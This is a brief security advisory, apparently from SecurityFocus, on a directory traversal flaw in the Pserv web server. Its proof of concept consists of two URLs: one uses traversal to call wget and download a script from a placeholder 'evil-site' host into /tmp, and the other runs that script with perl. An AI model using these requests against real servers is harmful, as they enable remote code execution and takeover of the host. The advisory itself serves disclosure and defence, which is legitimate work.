Pserv Directory Traversal Vulnerability

An exploit is not required. The following proof of concept demonstration was supplied:

The following url downloads a script (or executable) to the server:
http://www.example.com:2000/cgi-bin///////////../../../../../../../../usr/bin/wget?-q+http://evil-site/evil.pl/+-O+/tmp/evil.pl

This is how the script can be executed afterwards:
http://www.example.com:2000/cgi-bin///////////../../../../../../../../usr/bin/perl?/tmp/evil.pl


 

Privacy Statement
Copyright 2010, SecurityFocus